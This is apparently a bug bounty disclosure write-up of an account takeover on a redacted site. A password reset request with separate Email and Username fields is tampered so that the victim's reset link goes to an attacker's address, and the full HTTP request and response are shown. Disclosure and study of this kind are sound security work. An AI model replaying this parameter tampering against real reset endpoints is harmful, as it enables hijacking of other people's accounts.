This post is going to show how I was able to achieve an account takeover on a bug bounty program. Details on the target site are going to be heavily redacted due to the policy of public disclosure. That and the remediation is still ongoing.
Typically when approaching targets I will always navigate the site as if I were a “normal user”, doing this allowed me to find an interesting endpoint that allowed a user to reset a password by providing the email.
This caught my eye right away so what I did was input one of my registered emails into this field with the Burp intercept on. The POST response to this looked like:
POST /api/Membership/ResetPassword HTTP/2
Host: apisub.target.com
Content-Length: 302
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://sub.target.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://sub.target.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Email=rewscel-account%40notreal.email&Username=rewscel-account%40notreal.email&Url=https%3A%2F%2Fsub.target.com%2Fen&UrlSiteCollection=https%3A%2F%2Fsub.target.com&Language=en-US&SiteName=REDACTED&ConnectionString=REDACTED
Notice the parameters Email and Username. The application actually uses the email as the username after you’ve made an account. This means we can change the email parameter to an email that is not attached to the username. I modified the request to look like this:
Email=rewscel-attacker%40notreal.email&Username=rewscel-account%40notreal.email&Url=https%3A%2F%2Fsub.target.com%2Fen&UrlSiteCollection=https%3A%2F%2Fsub.target.com&Language=en-US&SiteName=REDACTED&ConnectionString=REDACTED
The email parameter is now an attacker controlled email.
The response to this request looks like the following:
HTTP/2 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Mar 2024 13:50:47 GMT
Content-Length: 13
"OK;LinkSent"
We can see we are getting an “OK;LinkSent” response, this means we should receive an email with a password reset link to the email we are under control over. In this case that email is “rewscel-attacker@notreal.email” and the username we are taking over is “rewscel-account@notreal.email” (victim).
After checking my email (rewscel-attacker@notreal.emai) I saw there was a password reset link sitting there waiting for me. The link looked like:
https://sub.target.com/en/Pages/PasswordReset.aspx?tokenreset=<REDACTEDTOKEN>
All that has to be done now is for the attacker to click the link and change the password. This bug allows the attacker to takeover any account as long as they know the email.
More information on this type of bug: https://cwe.mitre.org/data/definitions/620.html